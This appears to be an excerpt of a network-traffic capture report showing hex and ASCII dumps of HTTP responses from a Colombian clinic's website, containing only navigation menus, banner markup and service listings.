                                                                                                                                                                              2023-09-15 05:27:25 UTC112INData Raw: 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 75 72 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: li> <li class="nav-item ps-2 "><a href="especialidades/pediatricas/urologia" target="_self"
                                                                                                                                                                              2023-09-15 05:27:25 UTC114INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 47 61 73 74 72 6f 65 6e 74 65 72 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: target="_self" class="nav-link">Gastroenterologa</a> </li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC115INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 72 61 64 69 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="nav-item ps-2 "><a href="especialidades/pediatricas/radiologia" target="_self"
                                                                                                                                                                              2023-09-15 05:27:25 UTC116INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 46 69 73 69 61 74 72 c3 ad 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                              Data Ascii: class="nav-link">Fisiatra</a> </li> <li class="nav-item ps-2 "><a href="
                                                                                                                                                                              2023-09-15 05:27:25 UTC118INData Raw: 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73
                                                                                                                                                                              Data Ascii: </ul> </li> <li class="nav-item ps-2"> <a clas
                                                                                                                                                                              2023-09-15 05:27:25 UTC119INData Raw: 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 50 65 72 69 6e 61 74 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 67 69 6e 65 63 6f 62 73 74 65 74 72 69 63 69 61
                                                                                                                                                                              Data Ascii: class="nav-link">Perinatologa</a> </li> <li class="nav-item ps-2 "><a href="especialidades/ginecobstetricia
                                                                                                                                                                              2023-09-15 05:27:25 UTC123INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 6d 61 78 69 6c 6f 66 61 63 69 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20
                                                                                                                                                                              Data Ascii: </li> <li class="nav-item ps-2 "><a href="servicios/cirugia/maxilofacial" target="_self"
                                                                                                                                                                              2023-09-15 05:27:25 UTC127INData Raw: 74 77 65 65 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e 75 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 55 6e 69 64 61 64 65 73 20 64 65 20 63 75 69 64 61 64 6f 73 20 69 6e 74 65 6e 73 69 76 6f 73 20 3c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 20 70 6f 73 69 74
                                                                                                                                                                              Data Ascii: tween" data-bs-toggle="collapse" href="#subsubmenu-4"> Unidades de cuidados intensivos <i class="fa fa-angle-down posit
                                                                                                                                                                              2023-09-15 05:27:25 UTC131INData Raw: 38 30 30 30 0d 0a 73 65 72 76 69 63 69 6f 2d 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 53 65 72 76 69 63 69 6f 20 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a
                                                                                                                                                                              Data Ascii: 8000servicio-transfusional" target="_self" class="nav-link">Servicio transfusional</a> </li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC135INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 74 65 72 61 70 69 61 2f 66 69 73 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a
                                                                                                                                                                              Data Ascii: </li> <li class="nav-item ps-2 "><a href="servicios/terapia/fisica" target="_self"
                                                                                                                                                                              2023-09-15 05:27:25 UTC139INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 6d 65 64 69 63 69 6e 61 2d 66 69 73 69 63 61 2d 79 2d 72 65 68 61 62 69 6c 69 74 61 63 69 6f 6e 2f 65 6c 65 63 74 72 6f 6d 69 6f 67 72 61 66 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="nav-item ps-2 "><a href="servicios/medicina-fisica-y-rehabilitacion/electromiografia" target="_self"
                                                                                                                                                                              2023-09-15 05:27:25 UTC143INData Raw: 54 72 61 62 61 6a 6f 20 73 6f 63 69 61 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 74 65 72 61 70 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: Trabajo social</a> </li> <li class="nav-item ps-2 "><a href="pacientes/educacion-al-paciente/terapia"
                                                                                                                                                                              2023-09-15 05:27:25 UTC147INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 63 6f 6d 6f 2d 73 6f 6c 69 63 69 74 61 72 2d 6c 61 2d 68 69 73 74 6f 72 69 61 2d 63 6c 69 6e 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 c3 b3 6d 6f 20 73 6f 6c 69 63 69 74 61 72 20 6c 61 20 68 69 73 74 6f 72 69 61 20 63 6c c3 ad 6e 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <li class="nav-item ps-2 "><a class="nav-link" href="pacientes/como-solicitar-la-historia-clinica" target="_self">Cmo solicitar la historia clnica</a></li>
                                                                                                                                                                              2023-09-15 05:27:25 UTC152INData Raw: 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 54 41 52 54 20 52 45 56 4f 4c 55 54 49 4f 4e 20 53 4c 49 44 45 52 20 35 2e 34 2e 37 20 66 75 6c 6c 77 69 64 74 68 20 6d 6f 64 65 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 77 65 6c 63 6f 6d 65 22 20 63 6c 61 73 73 3d 22 72 65 76 5f 73 6c 69 64 65 72 20 66 75 6c 6c 77 69 64 74 68 61 62 61 6e 6e 65 72 20 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 76 65 72 73 69 6f 6e 3d 22 35 2e 34 2e 37 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: ing:0;margin-top:0;margin-bottom:0;"> ... START REVOLUTION SLIDER 5.4.7 fullwidth mode --> <div id="welcome" class="rev_slider fullwidthabanner " style="display:none;" data-version="5.4.7"> <ul>
                                                                                                                                                                              2023-09-15 05:27:25 UTC156INData Raw: 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 63 6f 6e 74 61 63 74 6f 2f 61 67 65 6e 64 61 2d 74 75 2d 63 69 74 61 20 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 4d 41 49 4e 20 49 4d 41 47 45 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2d 6d 6f 62 69 6c 65 2f 77 65 62 2d 34 35 30 2d 34 39 38 2e 77 65 62 70 22 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: ps://www.clinicasanluis.com.co/contacto/agenda-tu-cita > ... MAIN IMAGE --> <img src="https://www.clinicasanluis.com.co/images/cabezotes-mobile/web-450-498.webp" alt=""
                                                                                                                                                                              2023-09-15 05:27:25 UTC160INData Raw: 33 37 33 2d 32 33 34 2e 77 65 62 70 22 20 64 61 74 61 2d 6b 65 6e 62 75 72 6e 7a 6f 6f 6d 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2f 77 65 62 2d 33 37 33 2d 32 33 34 2e 77 65 62 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 62 67 70 6f 73 69 74 69 6f 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 20 64 61 74 61 2d 62 67 66 69 74 3d 22 63 6f 76 65 72 22 20 64 61 74 61 2d 62 67 70 61 72 61 6c 6c 61 78 3d 22 34 22 20 63 6c 61 73 73 3d 22 72 65 76 2d 73 6c 69 64 65 62 67 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6b
                                                                                                                                                                              Data Ascii: 373-234.webp" data-kenburnzoom="https://www.clinicasanluis.com.co/images/cabezotes/web-373-234.webp" data-bgposition="center center" data-bgfit="cover" data-bgparallax="4" class="rev-slidebg " data-k
                                                                                                                                                                              2023-09-15 05:27:25 UTC163INData Raw: 38 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 69 74 6c 65 3d 22 43 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 66 61 6e 63 79 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 66 61 6e 63 79 2d 6d 65 64 69 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 66 61 6e 63 79 2d 62 6f 78 2d 69 63 6f
                                                                                                                                                                              Data Ascii: 8000 title="Clinicasanluis"> </div> <div class="pq-fancy-box-content"> <div class="pq-fancy-media"> <div class="pq-fancy-box-ico
                                                                                                                                                                              2023-09-15 05:27:25 UTC167INData Raw: 6e 61 6c 65 73 20 71 75 65 20 63 72 65 61 6e 20 75 6e 20 61 6d 62 69 65 6e 74 65 20 73 65 67 75 72 6f 20 79 20 61 63 6f 67 65 64 6f 72 20 70 61 72 61 20 6c 6f 73 20 75 73 75 61 72 69 6f 73 20 79 20 70 61 63 69 65 6e 74 65 73 20 64 65 20 6c 61 20 69 6e 73 74 69 74 75 63 69 c3 b3 6e 2e 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 3c 73 74 72 6f 6e 67 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 37 25 22
                                                                                                                                                                              Data Ascii: nales que crean un ambiente seguro y acogedor para los usuarios y pacientes de la institucin.</p><h2 style="font-style:italic;"><span style="font-family:Verdana,Geneva,sans-serif;"><strong><span style="font-size:18px;"><span style="line-height:107%"
                                                                                                                                                                              2023-09-15 05:27:25 UTC171INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 62 6f 78 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 69 6e 66 6f 2d 74 65 78 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 73 75 62 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: </a> </div> <div class="pq-service-box-info"> <div class="pq-info-text"> <span class="pq-service-sub-title">
                                                                                                                                                                              2023-09-15 05:27:25 UTC175INData Raw: 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 2f 65 73 74 75 64 69 6f 73 2d 65 6c 65 63 74 72 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 73 75 62 73 65 63 74 69 6f 6e 73 2f 77 65 62 2d 65 73 74
                                                                                                                                                                              Data Ascii: k"> <div class="pq-service-img"> <a href="servicios/apoyo-diagnostico/estudios-electro-diagnosticos"> <img src="images/subsections/web-est
                                                                                                                                                                              2023-09-15 05:27:25 UTC179INData Raw: 74 69 63 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 70 71 2d 73 65 72 76 69 63 65 2d 74 69 74 6c 65 22 3e 43 75 72 73 6f 20 50 73 69 63 6f 70 72 6f 66 69 6c c3 a1 63 74 69 63 6f 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20
                                                                                                                                                                              Data Ascii: tico"> <h5 class="pq-service-title">Curso Psicoprofilctico</h5> </a> </div> </div>
                                                                                                                                                                              2023-09-15 05:27:25 UTC184INData Raw: 61 6d 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 72 2e 20 4a 6f 72 67 65 20 47 61 72 63 c3 ad 61 20 48 61 72 6b 65 72 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 35 3e 20 3c 73 70 61 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 70 71 2d 74 65 61 6d 2d 64 65 73
                                                                                                                                                                              Data Ascii: ame"> <p class="mb-0"> Dr. Jorge Garca Harker </p> </h5> <span class="pq-team-des
